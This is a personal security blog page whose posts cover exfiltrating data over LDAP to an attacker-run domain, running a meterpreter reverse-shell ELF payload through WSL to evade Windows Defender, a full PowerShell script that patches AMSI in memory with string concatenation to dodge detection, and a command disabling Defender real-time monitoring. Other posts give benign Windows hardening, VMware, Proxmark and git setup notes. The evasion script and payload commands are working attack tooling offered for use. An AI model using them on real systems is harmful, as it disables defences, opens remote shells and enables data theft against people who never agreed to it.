Kazam

Just another vulnerable WordPress site

An LDAP Exfil Technique

Recently I’ve been looking a lot at data exfiltration techniques in general, especially techniques that allow you to bypass network access controls and escape from PCI environments.

I recently discovered a little trick that you can use to traverse network boundaries and obfuscate the source of your data via LDAP, which means that as long as the environment uses active directory and there’s a device (such as a primary domain controller) that has the ability to cross network boundaries, you can leverage this technique to use any Windows box as a proxy between two boxes you control.

The idea goes like this — almost all windows boxes expose their IPC$ share over SMB, which doesn’t actually allow access to files but instead call specific methods from that machine. Among other things, this allows us to query a domain for a user. Not just the domain that the machine is joined to, but any domain. Simply put, we kindly ask the target to query a fake domain (set up by the attacker) to query for a specific user containing our data to be exfiltrated.

The mechanics of this are as follows:
1. Query a target for User: Data and Domain: ATTACKER.COM
2. Target issues a DNS SRV request for _ldap._tcp.SCF._sites.dc._msdcs.ATTACKER.COM
3. If ATTACKER.COM replied correctly, Target issues a CLDAP request to port 389 containing the data we have specified.

There’s a second, bonus technique here that we can use this to obfuscate the source of our DNS exfiltration, as the requests will look like they’re coming from our target.

I’ve successfully tested this technique and works well. The only issues arise when UDP traffic is blocked, as the request will come out as a UDP CLDAP packet, or when the DNS has issues. I might post my PoC code for replying properly with a SRV record if there’s interest. 

This was heavily inspired by Reino Mostert’s post a couple years back about Null Session attacks. This attack is possible where Null Session attacks are possible, but also since this is an exfiltration technique we can assume we’ve compromised domain credentials and perform the technique with those instead, which would make this technique blend in a little bit more and opens up the scope.

Another quick note is that this tecnique could be used for two-way communications since it allows for a response by the domain controller. C2?

Bypassing Windows Defender with the Windows Subsystem for Linux!

After watching BHIS’s Sacred Cash Cow Tipping 2020 I was inspired to try out a few of the techniques BHIS demo’d, and this is a pretty fun and odd one.

There’s a few issues with WSL that make it a really poor choice for hacking without some configurations. The interesting one here is that WSL does not use VHDs or emulate linux filesystems, in fact, you can navigate to %AppData%/Local/Packages/$LinuxDistro/LocalState/rootfs and interact with the entire filesystem.

This also means that every file you make/drop to WSL is scanned by Windows Defender. Don’t even try to install metasploit.

However, as BHIS points out, elf files are not scanned by Defender. So to test this, if you fire up a normal metasploit session and do a quick msfvenom -f elf -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 > payload.elf you can simply drop it to disk and run it through WSL. A shell comes back, no questions asked.

This is pretty cool and exciting and all, but there’s a few drawbacks. The first issue is that since you’re running from a linux payload and from within WSL, you can’t use typical metasploit windows goodies like priv and kiwi without first pivoting.

The other issue is that this technique has a lot of preconditions. You need to first have initial access obviously, but you also need the target to have WSL installed, with a linux distribution installed. This is not most workstations. Installing a linux distro into WSL requires you to first enable the WSL feature in Windows, then restart the machine, and finally install the distro of your choice. Steps 1 and 3 both require administrative privileges by default, so I don’t see a practical use-case unless you can somehow install WSL without admin or the machine is preconfigued.

It’s a very neat trick though, and runs all processes through WSL, which allows you to bypass application whitelisting as well.

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

“Turn off multicast name resolution” Enabled

Don’t need SMB? Turn it off

From Services.msc Disable and Stop “Server” AKA LanmanServer. Restart.

Need SMB but worried about Eternal Blue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false

 

Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to powershell with admin rights. For the record, I’m not sure if this will work on a domain joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistend and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
);
}
"@
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel, the exact code in his blog post no longer works because it contains “AmsiScanBuffer” but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open_vm_tools open_vm_tools_desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the bootloader, and if you have the same issue I did follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

sudo ./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github and clone it using the git address specified near the top of the page

git clone git@github.com:username/new_repo.gitg 
cd new_repo
git commit -m "First Commit!"

git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Overriding Windows TrustedInstaller Permissions

tl;dr
For a single file, all you have to do is:

takeown /F C:\FULL_PATH_TO_FILE
icacls C:\FULL_PATH_TO_FILE /grant Administrators:F

For an entire directory, it’s a bit longer:

takeown /F C:\FULL_PATH_TO_FOLDER
takeown /F C:\FULL_PATH_TO_FOLDER /r /d y
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Basically, this can be used to modify and overwrite Windows’s system files and other things you’re not supposed to touch. This can also be done from the GUI by assigning yourself to be the owner of the file, applying the change, closing the window, opening the permissions again, elevating to admin, and finally setting the permissions you would like.

Credit to Micah in the comments.

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2020 Kazam

Theme by Anders NorenUp ↑